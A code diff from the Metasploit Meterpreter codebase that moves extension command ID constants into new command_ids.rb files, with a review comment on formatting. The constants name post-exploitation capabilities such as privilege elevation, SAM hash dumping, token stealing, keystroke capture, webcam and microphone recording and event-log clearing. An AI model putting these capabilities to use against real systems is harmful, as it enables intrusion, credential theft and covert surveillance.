@@ -0,0 +1,21 @@ +# -*- coding: binary -*- +module Rex +module Post +module Meterpreter +module Extensions +module Powershell + +# ID for the extension (needs to be a multiple of 1000) +EXTENSION_ID_POWERSHELL = 14000 + +# Associated command ids +COMMAND_ID_POWERSHELL_ASSEMBLY_LOAD = EXTENSION_ID_POWERSHELL + 1 +COMMAND_ID_POWERSHELL_EXECUTE = EXTENSION_ID_POWERSHELL + 2 +COMMAND_ID_POWERSHELL_SESSION_REMOVE = EXTENSION_ID_POWERSHELL + 3 +COMMAND_ID_POWERSHELL_SHELL = EXTENSION_ID_POWERSHELL + 4 + +end +end +end +end +end diff --git a/lib/rex/post/meterpreter/extensions/powershell/powershell.rb b/lib/rex/post/meterpreter/extensions/powershell/powershell.rb index adeb44f09184a..b62a8b5f82425 100644 --- a/lib/rex/post/meterpreter/extensions/powershell/powershell.rb +++ b/lib/rex/post/meterpreter/extensions/powershell/powershell.rb @@ -1,6 +1,7 @@ # -*- coding: binary -*- require 'rex/post/meterpreter/extensions/powershell/tlv' +require 'rex/post/meterpreter/extensions/powershell/command_ids' module Rex module Post diff --git a/lib/rex/post/meterpreter/extensions/powershell/tlv.rb b/lib/rex/post/meterpreter/extensions/powershell/tlv.rb index eb6e670351f67..edb69d3c68ac6 100644 --- a/lib/rex/post/meterpreter/extensions/powershell/tlv.rb +++ b/lib/rex/post/meterpreter/extensions/powershell/tlv.rb @@ -5,15 +5,6 @@ module Meterpreter module Extensions module Powershell -# ID for the extension (needs to be a multiple of 1000) -EXTENSION_ID_POWERSHELL = 14000 - -# Associated command ids -COMMAND_ID_POWERSHELL_ASSEMBLY_LOAD = EXTENSION_ID_POWERSHELL + 1 -COMMAND_ID_POWERSHELL_EXECUTE = EXTENSION_ID_POWERSHELL + 2 -COMMAND_ID_POWERSHELL_SESSION_REMOVE = EXTENSION_ID_POWERSHELL + 3 -COMMAND_ID_POWERSHELL_SHELL = EXTENSION_ID_POWERSHELL + 4 - TLV_TYPE_POWERSHELL_SESSIONID = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 1) TLV_TYPE_POWERSHELL_CODE = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 2) TLV_TYPE_POWERSHELL_RESULT = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 3) 
diff --git a/lib/rex/post/meterpreter/extensions/priv/command_ids.rb b/lib/rex/post/meterpreter/extensions/priv/command_ids.rb new file mode 100644 index 0000000000000..1b4d89fb1ff81 --- /dev/null +++ b/lib/rex/post/meterpreter/extensions/priv/command_ids.rb @@ -0,0 +1,24 @@ +# -*- coding: binary -*- +module Rex +module Post +module Meterpreter +module Extensions +module Priv + +# ID for the extension (needs to be a multiple of 1000) +EXTENSION_ID_PRIV = 2000 + +# Associated command ids +COMMAND_ID_PRIV_ELEVATE_GETSYSTEM = EXTENSION_ID_PRIV + 1 +COMMAND_ID_PRIV_FS_BLANK_DIRECTORY_MACE = EXTENSION_ID_PRIV + 2 +COMMAND_ID_PRIV_FS_BLANK_FILE_MACE = EXTENSION_ID_PRIV + 3 +COMMAND_ID_PRIV_FS_GET_FILE_MACE = EXTENSION_ID_PRIV + 4 +COMMAND_ID_PRIV_FS_SET_FILE_MACE = EXTENSION_ID_PRIV + 5 +COMMAND_ID_PRIV_FS_SET_FILE_MACE_FROM_FILE = EXTENSION_ID_PRIV + 6 +COMMAND_ID_PRIV_PASSWD_GET_SAM_HASHES = EXTENSION_ID_PRIV + 7 + +end +end +end +end +end diff --git a/lib/rex/post/meterpreter/extensions/priv/priv.rb b/lib/rex/post/meterpreter/extensions/priv/priv.rb index 78e07f0923d7d..296c6c73ae23d 100644 --- a/lib/rex/post/meterpreter/extensions/priv/priv.rb +++ b/lib/rex/post/meterpreter/extensions/priv/priv.rb @@ -1,6 +1,7 @@ # -*- coding: binary -*- require 'rex/post/meterpreter/extensions/priv/tlv' +require 'rex/post/meterpreter/extensions/priv/command_ids' require 'rex/post/meterpreter/extensions/priv/passwd' require 'rex/post/meterpreter/extensions/priv/fs' diff --git a/lib/rex/post/meterpreter/extensions/priv/tlv.rb b/lib/rex/post/meterpreter/extensions/priv/tlv.rb index a19ffdef3c978..92cf1b7f4ad43 100644 --- a/lib/rex/post/meterpreter/extensions/priv/tlv.rb +++ b/lib/rex/post/meterpreter/extensions/priv/tlv.rb 
@@ -5,18 +5,6 @@ module Meterpreter module Extensions module Priv -# ID for the extension (needs to be a multiple of 1000) -EXTENSION_ID_PRIV = 2000 - -# Associated command ids -COMMAND_ID_PRIV_ELEVATE_GETSYSTEM = EXTENSION_ID_PRIV + 1 -COMMAND_ID_PRIV_FS_BLANK_DIRECTORY_MACE = EXTENSION_ID_PRIV + 2 -COMMAND_ID_PRIV_FS_BLANK_FILE_MACE = EXTENSION_ID_PRIV + 3 -COMMAND_ID_PRIV_FS_GET_FILE_MACE = EXTENSION_ID_PRIV + 4 -COMMAND_ID_PRIV_FS_SET_FILE_MACE = EXTENSION_ID_PRIV + 5 -COMMAND_ID_PRIV_FS_SET_FILE_MACE_FROM_FILE = EXTENSION_ID_PRIV + 6 -COMMAND_ID_PRIV_PASSWD_GET_SAM_HASHES = EXTENSION_ID_PRIV + 7 - # Passwd TLV_TYPE_SAM_HASHES = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 1) diff --git a/lib/rex/post/meterpreter/extensions/python/command_ids.rb b/lib/rex/post/meterpreter/extensions/python/command_ids.rb new file mode 100644 index 0000000000000..cea23bac9cc25 --- /dev/null +++ b/lib/rex/post/meterpreter/extensions/python/command_ids.rb @@ -0,0 +1,19 @@ +# -*- coding: binary -*- +module Rex +module Post +module Meterpreter +module Extensions +module Python + +# ID for the extension (needs to be a multiple of 1000) +EXTENSION_ID_PYTHON = 13000 + +# Associated command ids +COMMAND_ID_PYTHON_EXECUTE = EXTENSION_ID_PYTHON + 1 +COMMAND_ID_PYTHON_RESET = EXTENSION_ID_PYTHON + 2 + +end +end +end +end +end diff --git a/lib/rex/post/meterpreter/extensions/python/python.rb b/lib/rex/post/meterpreter/extensions/python/python.rb index 36cb69465635b..0d35afd91d1ab 100644 --- a/lib/rex/post/meterpreter/extensions/python/python.rb +++ b/lib/rex/post/meterpreter/extensions/python/python.rb @@ -1,6 +1,7 @@ # -*- coding: binary -*- require 'rex/post/meterpreter/extensions/python/tlv' +require 'rex/post/meterpreter/extensions/python/command_ids' require 'set' module Rex diff --git a/lib/rex/post/meterpreter/extensions/python/tlv.rb b/lib/rex/post/meterpreter/extensions/python/tlv.rb index 181dd9ebfaa8a..318593a6b8cca 100644 --- a/lib/rex/post/meterpreter/extensions/python/tlv.rb 
+++ b/lib/rex/post/meterpreter/extensions/python/tlv.rb @@ -5,14 +5,6 @@ module Meterpreter module Extensions module Python -# ID for the extension (needs to be a multiple of 1000) -EXTENSION_ID_PYTHON = 13000 - -# Associated command ids -COMMAND_ID_PYTHON_EXECUTE = EXTENSION_ID_PYTHON + 1 -COMMAND_ID_PYTHON_RESET = EXTENSION_ID_PYTHON + 2 - - TLV_TYPE_PYTHON_STDOUT = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 1) TLV_TYPE_PYTHON_STDERR = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 2) TLV_TYPE_PYTHON_CODE = TLV_META_TYPE_RAW | (TLV_EXTENSIONS + 3) diff --git a/lib/rex/post/meterpreter/extensions/sniffer/command_ids.rb b/lib/rex/post/meterpreter/extensions/sniffer/command_ids.rb new file mode 100644 index 0000000000000..d2d5b7a55bfea --- /dev/null +++ b/lib/rex/post/meterpreter/extensions/sniffer/command_ids.rb @@ -0,0 +1,24 @@ +# -*- coding: binary -*- +module Rex +module Post +module Meterpreter +module Extensions +module Sniffer + +# ID for the extension (needs to be a multiple of 1000) +EXTENSION_ID_SNIFFER = 4000 + +# Associated command ids +COMMAND_ID_SNIFFER_CAPTURE_DUMP = EXTENSION_ID_SNIFFER + 1 +COMMAND_ID_SNIFFER_CAPTURE_DUMP_READ = EXTENSION_ID_SNIFFER + 2 +COMMAND_ID_SNIFFER_CAPTURE_RELEASE = EXTENSION_ID_SNIFFER + 3 +COMMAND_ID_SNIFFER_CAPTURE_START = EXTENSION_ID_SNIFFER + 4 +COMMAND_ID_SNIFFER_CAPTURE_STATS = EXTENSION_ID_SNIFFER + 5 +COMMAND_ID_SNIFFER_CAPTURE_STOP = EXTENSION_ID_SNIFFER + 6 +COMMAND_ID_SNIFFER_INTERFACES = EXTENSION_ID_SNIFFER + 7 + +end +end +end +end +end diff --git a/lib/rex/post/meterpreter/extensions/sniffer/sniffer.rb b/lib/rex/post/meterpreter/extensions/sniffer/sniffer.rb index 3b7870d611105..5aeb8b62d5b0e 100644 --- a/lib/rex/post/meterpreter/extensions/sniffer/sniffer.rb +++ b/lib/rex/post/meterpreter/extensions/sniffer/sniffer.rb @@ -1,6 +1,7 @@ # -*- coding: binary -*- require 'rex/post/meterpreter/extensions/sniffer/tlv' +require 'rex/post/meterpreter/extensions/sniffer/command_ids' require 'rex/proto/smb/utils' module Rex 
diff --git a/lib/rex/post/meterpreter/extensions/sniffer/tlv.rb b/lib/rex/post/meterpreter/extensions/sniffer/tlv.rb index fbb4af3c68c53..ace6485cff207 100644 --- a/lib/rex/post/meterpreter/extensions/sniffer/tlv.rb +++ b/lib/rex/post/meterpreter/extensions/sniffer/tlv.rb @@ -5,18 +5,6 @@ module Meterpreter module Extensions module Sniffer -# ID for the extension (needs to be a multiple of 1000) -EXTENSION_ID_SNIFFER = 4000 - -# Associated command ids -COMMAND_ID_SNIFFER_CAPTURE_DUMP = EXTENSION_ID_SNIFFER + 1 -COMMAND_ID_SNIFFER_CAPTURE_DUMP_READ = EXTENSION_ID_SNIFFER + 2 -COMMAND_ID_SNIFFER_CAPTURE_RELEASE = EXTENSION_ID_SNIFFER + 3 -COMMAND_ID_SNIFFER_CAPTURE_START = EXTENSION_ID_SNIFFER + 4 -COMMAND_ID_SNIFFER_CAPTURE_STATS = EXTENSION_ID_SNIFFER + 5 -COMMAND_ID_SNIFFER_CAPTURE_STOP = EXTENSION_ID_SNIFFER + 6 -COMMAND_ID_SNIFFER_INTERFACES = EXTENSION_ID_SNIFFER + 7 - TLV_TYPE_EXTENSION_SNIFFER = 0 TLV_TYPE_SNIFFER_INTERFACES = TLV_META_TYPE_GROUP | (TLV_TYPE_EXTENSION_SNIFFER + TLV_EXTENSIONS + 1) diff --git a/lib/rex/post/meterpreter/extensions/stdapi/command_ids.rb b/lib/rex/post/meterpreter/extensions/stdapi/command_ids.rb new file mode 100644 index 0000000000000..6d4f21641f3b4 --- /dev/null +++ b/lib/rex/post/meterpreter/extensions/stdapi/command_ids.rb 
@@ -0,0 +1,132 @@ +# -*- coding: binary -*- + +module Rex +module Post +module Meterpreter +module Extensions +module Stdapi + +# ID for the extension (needs to be a multiple of 1000) +EXTENSION_ID_STDAPI = 1000 + +# Associated command ids +COMMAND_ID_STDAPI_FS_CHDIR = EXTENSION_ID_STDAPI + 1 +COMMAND_ID_STDAPI_FS_CHMOD = EXTENSION_ID_STDAPI + 2 +COMMAND_ID_STDAPI_FS_DELETE_DIR = EXTENSION_ID_STDAPI + 3 +COMMAND_ID_STDAPI_FS_DELETE_FILE = EXTENSION_ID_STDAPI + 4 +COMMAND_ID_STDAPI_FS_FILE_COPY = EXTENSION_ID_STDAPI + 5 +COMMAND_ID_STDAPI_FS_FILE_EXPAND_PATH = EXTENSION_ID_STDAPI + 6 +COMMAND_ID_STDAPI_FS_FILE_MOVE = EXTENSION_ID_STDAPI + 7 +COMMAND_ID_STDAPI_FS_GETWD = EXTENSION_ID_STDAPI + 8 +COMMAND_ID_STDAPI_FS_LS = EXTENSION_ID_STDAPI + 9 +COMMAND_ID_STDAPI_FS_MD5 = EXTENSION_ID_STDAPI + 10 +COMMAND_ID_STDAPI_FS_MKDIR = EXTENSION_ID_STDAPI + 11 +COMMAND_ID_STDAPI_FS_MOUNT_SHOW = EXTENSION_ID_STDAPI + 12 +COMMAND_ID_STDAPI_FS_SEARCH = EXTENSION_ID_STDAPI + 13 +COMMAND_ID_STDAPI_FS_SEPARATOR = EXTENSION_ID_STDAPI + 14 +COMMAND_ID_STDAPI_FS_SHA1 = EXTENSION_ID_STDAPI + 15 +COMMAND_ID_STDAPI_FS_STAT = EXTENSION_ID_STDAPI + 16 +COMMAND_ID_STDAPI_NET_CONFIG_ADD_ROUTE = EXTENSION_ID_STDAPI + 17 +COMMAND_ID_STDAPI_NET_CONFIG_GET_ARP_TABLE = EXTENSION_ID_STDAPI + 18 +COMMAND_ID_STDAPI_NET_CONFIG_GET_INTERFACES = EXTENSION_ID_STDAPI + 19 +COMMAND_ID_STDAPI_NET_CONFIG_GET_NETSTAT = EXTENSION_ID_STDAPI + 20 +COMMAND_ID_STDAPI_NET_CONFIG_GET_PROXY = EXTENSION_ID_STDAPI + 21 +COMMAND_ID_STDAPI_NET_CONFIG_GET_ROUTES = EXTENSION_ID_STDAPI + 22 +COMMAND_ID_STDAPI_NET_CONFIG_REMOVE_ROUTE = EXTENSION_ID_STDAPI + 23 +COMMAND_ID_STDAPI_NET_RESOLVE_HOST = EXTENSION_ID_STDAPI + 24 +COMMAND_ID_STDAPI_NET_RESOLVE_HOSTS = EXTENSION_ID_STDAPI + 25 +COMMAND_ID_STDAPI_NET_SOCKET_TCP_SHUTDOWN = EXTENSION_ID_STDAPI + 26 +COMMAND_ID_STDAPI_NET_TCP_CHANNEL_OPEN = EXTENSION_ID_STDAPI + 27 +COMMAND_ID_STDAPI_RAILGUN_API = EXTENSION_ID_STDAPI + 28 +COMMAND_ID_STDAPI_RAILGUN_API_MULTI = 
EXTENSION_ID_STDAPI + 29 +COMMAND_ID_STDAPI_RAILGUN_MEMREAD = EXTENSION_ID_STDAPI + 30 +COMMAND_ID_STDAPI_RAILGUN_MEMWRITE = EXTENSION_ID_STDAPI + 31 +COMMAND_ID_STDAPI_REGISTRY_CHECK_KEY_EXISTS = EXTENSION_ID_STDAPI + 32 +COMMAND_ID_STDAPI_REGISTRY_CLOSE_KEY = EXTENSION_ID_STDAPI + 33 +COMMAND_ID_STDAPI_REGISTRY_CREATE_KEY = EXTENSION_ID_STDAPI + 34 +COMMAND_ID_STDAPI_REGISTRY_DELETE_KEY = EXTENSION_ID_STDAPI + 35 +COMMAND_ID_STDAPI_REGISTRY_DELETE_VALUE = EXTENSION_ID_STDAPI + 36 +COMMAND_ID_STDAPI_REGISTRY_ENUM_KEY = EXTENSION_ID_STDAPI + 37 +COMMAND_ID_STDAPI_REGISTRY_ENUM_KEY_DIRECT = EXTENSION_ID_STDAPI + 38 +COMMAND_ID_STDAPI_REGISTRY_ENUM_VALUE = EXTENSION_ID_STDAPI + 39 +COMMAND_ID_STDAPI_REGISTRY_ENUM_VALUE_DIRECT = EXTENSION_ID_STDAPI + 40 +COMMAND_ID_STDAPI_REGISTRY_LOAD_KEY = EXTENSION_ID_STDAPI + 41 +COMMAND_ID_STDAPI_REGISTRY_OPEN_KEY = EXTENSION_ID_STDAPI + 42 +COMMAND_ID_STDAPI_REGISTRY_OPEN_REMOTE_KEY = EXTENSION_ID_STDAPI + 43 +COMMAND_ID_STDAPI_REGISTRY_QUERY_CLASS = EXTENSION_ID_STDAPI + 44 +COMMAND_ID_STDAPI_REGISTRY_QUERY_VALUE = EXTENSION_ID_STDAPI + 45 +COMMAND_ID_STDAPI_REGISTRY_QUERY_VALUE_DIRECT = EXTENSION_ID_STDAPI + 46 +COMMAND_ID_STDAPI_REGISTRY_SET_VALUE = EXTENSION_ID_STDAPI + 47 +COMMAND_ID_STDAPI_REGISTRY_SET_VALUE_DIRECT = EXTENSION_ID_STDAPI + 48 +COMMAND_ID_STDAPI_REGISTRY_UNLOAD_KEY = EXTENSION_ID_STDAPI + 49 +COMMAND_ID_STDAPI_SYS_CONFIG_DRIVER_LIST = EXTENSION_ID_STDAPI + 50 +COMMAND_ID_STDAPI_SYS_CONFIG_DROP_TOKEN = EXTENSION_ID_STDAPI + 51 +COMMAND_ID_STDAPI_SYS_CONFIG_GETENV = EXTENSION_ID_STDAPI + 52 +COMMAND_ID_STDAPI_SYS_CONFIG_GETPRIVS = EXTENSION_ID_STDAPI + 53 +COMMAND_ID_STDAPI_SYS_CONFIG_GETSID = EXTENSION_ID_STDAPI + 54 +COMMAND_ID_STDAPI_SYS_CONFIG_GETUID = EXTENSION_ID_STDAPI + 55 +COMMAND_ID_STDAPI_SYS_CONFIG_LOCALTIME = EXTENSION_ID_STDAPI + 56 +COMMAND_ID_STDAPI_SYS_CONFIG_REV2SELF = EXTENSION_ID_STDAPI + 57 +COMMAND_ID_STDAPI_SYS_CONFIG_STEAL_TOKEN = EXTENSION_ID_STDAPI + 58 
+COMMAND_ID_STDAPI_SYS_CONFIG_SYSINFO = EXTENSION_ID_STDAPI + 59 +COMMAND_ID_STDAPI_SYS_EVENTLOG_CLEAR = EXTENSION_ID_STDAPI + 60 +COMMAND_ID_STDAPI_SYS_EVENTLOG_CLOSE = EXTENSION_ID_STDAPI + 61 +COMMAND_ID_STDAPI_SYS_EVENTLOG_NUMRECORDS = EXTENSION_ID_STDAPI + 62 +COMMAND_ID_STDAPI_SYS_EVENTLOG_OLDEST = EXTENSION_ID_STDAPI + 63 +COMMAND_ID_STDAPI_SYS_EVENTLOG_OPEN = EXTENSION_ID_STDAPI + 64 +COMMAND_ID_STDAPI_SYS_EVENTLOG_READ = EXTENSION_ID_STDAPI + 65 +COMMAND_ID_STDAPI_SYS_POWER_EXITWINDOWS = EXTENSION_ID_STDAPI + 66 +COMMAND_ID_STDAPI_SYS_PROCESS_ATTACH = EXTENSION_ID_STDAPI + 67 +COMMAND_ID_STDAPI_SYS_PROCESS_CLOSE = EXTENSION_ID_STDAPI + 68 +COMMAND_ID_STDAPI_SYS_PROCESS_EXECUTE = EXTENSION_ID_STDAPI + 69 +COMMAND_ID_STDAPI_SYS_PROCESS_GET_INFO = EXTENSION_ID_STDAPI + 70 +COMMAND_ID_STDAPI_SYS_PROCESS_GET_PROCESSES = EXTENSION_ID_STDAPI + 71 +COMMAND_ID_STDAPI_SYS_PROCESS_GETPID = EXTENSION_ID_STDAPI + 72 +COMMAND_ID_STDAPI_SYS_PROCESS_IMAGE_GET_IMAGES = EXTENSION_ID_STDAPI + 73 +COMMAND_ID_STDAPI_SYS_PROCESS_IMAGE_GET_PROC_ADDRESS = EXTENSION_ID_STDAPI + 74 +COMMAND_ID_STDAPI_SYS_PROCESS_IMAGE_LOAD = EXTENSION_ID_STDAPI + 75 +COMMAND_ID_STDAPI_SYS_PROCESS_IMAGE_UNLOAD = EXTENSION_ID_STDAPI + 76 +COMMAND_ID_STDAPI_SYS_PROCESS_KILL = EXTENSION_ID_STDAPI + 77 +COMMAND_ID_STDAPI_SYS_PROCESS_MEMORY_ALLOCATE = EXTENSION_ID_STDAPI + 78 +COMMAND_ID_STDAPI_SYS_PROCESS_MEMORY_FREE = EXTENSION_ID_STDAPI + 79 +COMMAND_ID_STDAPI_SYS_PROCESS_MEMORY_LOCK = EXTENSION_ID_STDAPI + 80 +COMMAND_ID_STDAPI_SYS_PROCESS_MEMORY_PROTECT = EXTENSION_ID_STDAPI + 81 +COMMAND_ID_STDAPI_SYS_PROCESS_MEMORY_QUERY = EXTENSION_ID_STDAPI + 82 +COMMAND_ID_STDAPI_SYS_PROCESS_MEMORY_READ = EXTENSION_ID_STDAPI + 83 +COMMAND_ID_STDAPI_SYS_PROCESS_MEMORY_UNLOCK = EXTENSION_ID_STDAPI + 84 +COMMAND_ID_STDAPI_SYS_PROCESS_MEMORY_WRITE = EXTENSION_ID_STDAPI + 85 +COMMAND_ID_STDAPI_SYS_PROCESS_THREAD_CLOSE = EXTENSION_ID_STDAPI + 86 +COMMAND_ID_STDAPI_SYS_PROCESS_THREAD_CREATE = EXTENSION_ID_STDAPI + 87 
+COMMAND_ID_STDAPI_SYS_PROCESS_THREAD_GET_THREADS = EXTENSION_ID_STDAPI + 88 +COMMAND_ID_STDAPI_SYS_PROCESS_THREAD_OPEN = EXTENSION_ID_STDAPI + 89 +COMMAND_ID_STDAPI_SYS_PROCESS_THREAD_QUERY_REGS = EXTENSION_ID_STDAPI + 90 +COMMAND_ID_STDAPI_SYS_PROCESS_THREAD_RESUME = EXTENSION_ID_STDAPI + 91 +COMMAND_ID_STDAPI_SYS_PROCESS_THREAD_SET_REGS = EXTENSION_ID_STDAPI + 92 +COMMAND_ID_STDAPI_SYS_PROCESS_THREAD_SUSPEND = EXTENSION_ID_STDAPI + 93 +COMMAND_ID_STDAPI_SYS_PROCESS_THREAD_TERMINATE = EXTENSION_ID_STDAPI + 94 +COMMAND_ID_STDAPI_SYS_PROCESS_WAIT = EXTENSION_ID_STDAPI + 95 +COMMAND_ID_STDAPI_UI_DESKTOP_ENUM = EXTENSION_ID_STDAPI + 96 +COMMAND_ID_STDAPI_UI_DESKTOP_GET = EXTENSION_ID_STDAPI + 97 +COMMAND_ID_STDAPI_UI_DESKTOP_SCREENSHOT = EXTENSION_ID_STDAPI + 98 +COMMAND_ID_STDAPI_UI_DESKTOP_SET = EXTENSION_ID_STDAPI + 99 +COMMAND_ID_STDAPI_UI_ENABLE_KEYBOARD = EXTENSION_ID_STDAPI + 100 +COMMAND_ID_STDAPI_UI_ENABLE_MOUSE = EXTENSION_ID_STDAPI + 101 +COMMAND_ID_STDAPI_UI_GET_IDLE_TIME = EXTENSION_ID_STDAPI + 102 +COMMAND_ID_STDAPI_UI_GET_KEYS_UTF8 = EXTENSION_ID_STDAPI + 103 +COMMAND_ID_STDAPI_UI_SEND_KEYEVENT = EXTENSION_ID_STDAPI + 104 +COMMAND_ID_STDAPI_UI_SEND_KEYS = EXTENSION_ID_STDAPI + 105 +COMMAND_ID_STDAPI_UI_SEND_MOUSE = EXTENSION_ID_STDAPI + 106 +COMMAND_ID_STDAPI_UI_START_KEYSCAN = EXTENSION_ID_STDAPI + 107 +COMMAND_ID_STDAPI_UI_STOP_KEYSCAN = EXTENSION_ID_STDAPI + 108 +COMMAND_ID_STDAPI_UI_UNLOCK_DESKTOP = EXTENSION_ID_STDAPI + 109 +COMMAND_ID_STDAPI_WEBCAM_AUDIO_RECORD = EXTENSION_ID_STDAPI + 110 +COMMAND_ID_STDAPI_WEBCAM_GET_FRAME = EXTENSION_ID_STDAPI + 111 +COMMAND_ID_STDAPI_WEBCAM_LIST = EXTENSION_ID_STDAPI + 112 +COMMAND_ID_STDAPI_WEBCAM_START = EXTENSION_ID_STDAPI + 113 +COMMAND_ID_STDAPI_WEBCAM_STOP = EXTENSION_ID_STDAPI + 114 +COMMAND_ID_STDAPI_AUDIO_MIC_START = EXTENSION_ID_STDAPI + 115 +COMMAND_ID_STDAPI_AUDIO_MIC_STOP = EXTENSION_ID_STDAPI + 116 +COMMAND_ID_STDAPI_AUDIO_MIC_LIST = EXTENSION_ID_STDAPI + 117 + +end; end; end; end; end + 
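Review bot: The stdapi command_ids.rb closes its five modules with `end; end; end; end; end` on a single line, whereas every other command_ids.rb in this patch (and the tlv.rb files they were lifted from) puts one `end` per line; the file also appears to end with an added blank line. Replacing the semicolon-joined line with five `end` lines keeps the new files uniform and matches the surrounding code base. stdapi is also the file most likely to grow, and with 117 hand-assigned offsets a duplicated or skipped number would not be caught at load time, so a spec asserting that the COMMAND_ID_STDAPI_* values are unique would be cheap insurance.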
diff --git a/lib/rex/post/meterpreter/extensions/stdapi/stdapi.rb b/lib/rex/post/meterpreter/extensions/stdapi/stdapi.rb index c176a9f296e0c..af1e73749705e 100644 --- a/lib/rex/post/meterpreter/extensions/stdapi/stdapi.rb +++ b/lib/rex/post/meterpreter/extensions/stdapi/stdapi.rb @@ -4,6 +4,7 @@ require 'rex/post/meterpreter/extension' require 'rex/post/meterpreter/extensions/stdapi/constants' require 'rex/post/meterpreter/extensions/stdapi/tlv' +require 'rex/post/meterpreter/extensions/stdapi/command_ids' require 'rex/post/meterpreter/extensions/stdapi/fs/dir' require 'rex/post/meterpreter/extensions/stdapi/fs/file' require 'rex/post/meterpreter/extensions/stdapi/fs/file_stat' diff --git a/lib/rex/post/meterpreter/extensions/stdapi/tlv.rb b/lib/rex/post/meterpreter/extensions/stdapi/tlv.rb index 55c61b873beb8..14feacef4b0be 100644 --- a/lib/rex/post/meterpreter/extensions/stdapi/tlv.rb +++ b/lib/rex/post/meterpreter/extensions/stdapi/tlv.rb 
@@ -6,130 +6,6 @@ module Meterpreter module Extensions module Stdapi -# ID for the extension (needs to be a multiple of 1000) -EXTENSION_ID_STDAPI = 1000 - -# Associated command ids -COMMAND_ID_STDAPI_FS_CHDIR = EXTENSION_ID_STDAPI + 1 -COMMAND_ID_STDAPI_FS_CHMOD = EXTENSION_ID_STDAPI + 2 -COMMAND_ID_STDAPI_FS_DELETE_DIR = EXTENSION_ID_STDAPI + 3 -COMMAND_ID_STDAPI_FS_DELETE_FILE = EXTENSION_ID_STDAPI + 4 -COMMAND_ID_STDAPI_FS_FILE_COPY = EXTENSION_ID_STDAPI + 5 -COMMAND_ID_STDAPI_FS_FILE_EXPAND_PATH = EXTENSION_ID_STDAPI + 6 -COMMAND_ID_STDAPI_FS_FILE_MOVE = EXTENSION_ID_STDAPI + 7 -COMMAND_ID_STDAPI_FS_GETWD = EXTENSION_ID_STDAPI + 8 -COMMAND_ID_STDAPI_FS_LS = EXTENSION_ID_STDAPI + 9 -COMMAND_ID_STDAPI_FS_MD5 = EXTENSION_ID_STDAPI + 10 -COMMAND_ID_STDAPI_FS_MKDIR = EXTENSION_ID_STDAPI + 11 -COMMAND_ID_STDAPI_FS_MOUNT_SHOW = EXTENSION_ID_STDAPI + 12 -COMMAND_ID_STDAPI_FS_SEARCH = EXTENSION_ID_STDAPI + 13 -COMMAND_ID_STDAPI_FS_SEPARATOR = EXTENSION_ID_STDAPI + 14 -COMMAND_ID_STDAPI_FS_SHA1 = EXTENSION_ID_STDAPI + 15 -COMMAND_ID_STDAPI_FS_STAT = EXTENSION_ID_STDAPI + 16 -COMMAND_ID_STDAPI_NET_CONFIG_ADD_ROUTE = EXTENSION_ID_STDAPI + 17 -COMMAND_ID_STDAPI_NET_CONFIG_GET_ARP_TABLE = EXTENSION_ID_STDAPI + 18 -COMMAND_ID_STDAPI_NET_CONFIG_GET_INTERFACES = EXTENSION_ID_STDAPI + 19 -COMMAND_ID_STDAPI_NET_CONFIG_GET_NETSTAT = EXTENSION_ID_STDAPI + 20 -COMMAND_ID_STDAPI_NET_CONFIG_GET_PROXY = EXTENSION_ID_STDAPI + 21 -COMMAND_ID_STDAPI_NET_CONFIG_GET_ROUTES = EXTENSION_ID_STDAPI + 22 -COMMAND_ID_STDAPI_NET_CONFIG_REMOVE_ROUTE = EXTENSION_ID_STDAPI + 23 -COMMAND_ID_STDAPI_NET_RESOLVE_HOST = EXTENSION_ID_STDAPI + 24 -COMMAND_ID_STDAPI_NET_RESOLVE_HOSTS = EXTENSION_ID_STDAPI + 25 -COMMAND_ID_STDAPI_NET_SOCKET_TCP_SHUTDOWN = EXTENSION_ID_STDAPI + 26 -COMMAND_ID_STDAPI_NET_TCP_CHANNEL_OPEN = EXTENSION_ID_STDAPI + 27 -COMMAND_ID_STDAPI_RAILGUN_API = EXTENSION_ID_STDAPI + 28 -COMMAND_ID_STDAPI_RAILGUN_API_MULTI = EXTENSION_ID_STDAPI + 29 -COMMAND_ID_STDAPI_RAILGUN_MEMREAD = 
EXTENSION_ID_STDAPI + 30 -COMMAND_ID_STDAPI_RAILGUN_MEMWRITE = EXTENSION_ID_STDAPI + 31 -COMMAND_ID_STDAPI_REGISTRY_CHECK_KEY_EXISTS = EXTENSION_ID_STDAPI + 32 -COMMAND_ID_STDAPI_REGISTRY_CLOSE_KEY = EXTENSION_ID_STDAPI + 33 -COMMAND_ID_STDAPI_REGISTRY_CREATE_KEY = EXTENSION_ID_STDAPI + 34 -COMMAND_ID_STDAPI_REGISTRY_DELETE_KEY = EXTENSION_ID_STDAPI + 35 -COMMAND_ID_STDAPI_REGISTRY_DELETE_VALUE = EXTENSION_ID_STDAPI + 36 -COMMAND_ID_STDAPI_REGISTRY_ENUM_KEY = EXTENSION_ID_STDAPI + 37 -COMMAND_ID_STDAPI_REGISTRY_ENUM_KEY_DIRECT = EXTENSION_ID_STDAPI + 38 -COMMAND_ID_STDAPI_REGISTRY_ENUM_VALUE = EXTENSION_ID_STDAPI + 39 -COMMAND_ID_STDAPI_REGISTRY_ENUM_VALUE_DIRECT = EXTENSION_ID_STDAPI + 40 -COMMAND_ID_STDAPI_REGISTRY_LOAD_KEY = EXTENSION_ID_STDAPI + 41 -COMMAND_ID_STDAPI_REGISTRY_OPEN_KEY = EXTENSION_ID_STDAPI + 42 -COMMAND_ID_STDAPI_REGISTRY_OPEN_REMOTE_KEY = EXTENSION_ID_STDAPI + 43 -COMMAND_ID_STDAPI_REGISTRY_QUERY_CLASS = EXTENSION_ID_STDAPI + 44 -COMMAND_ID_STDAPI_REGISTRY_QUERY_VALUE = EXTENSION_ID_STDAPI + 45 -COMMAND_ID_STDAPI_REGISTRY_QUERY_VALUE_DIRECT = EXTENSION_ID_STDAPI + 46 -COMMAND_ID_STDAPI_REGISTRY_SET_VALUE = EXTENSION_ID_STDAPI + 47 -COMMAND_ID_STDAPI_REGISTRY_SET_VALUE_DIRECT = EXTENSION_ID_STDAPI + 48 -COMMAND_ID_STDAPI_REGISTRY_UNLOAD_KEY = EXTENSION_ID_STDAPI + 49 -COMMAND_ID_STDAPI_SYS_CONFIG_DRIVER_LIST = EXTENSION_ID_STDAPI + 50 -COMMAND_ID_STDAPI_SYS_CONFIG_DROP_TOKEN = EXTENSION_ID_STDAPI + 51 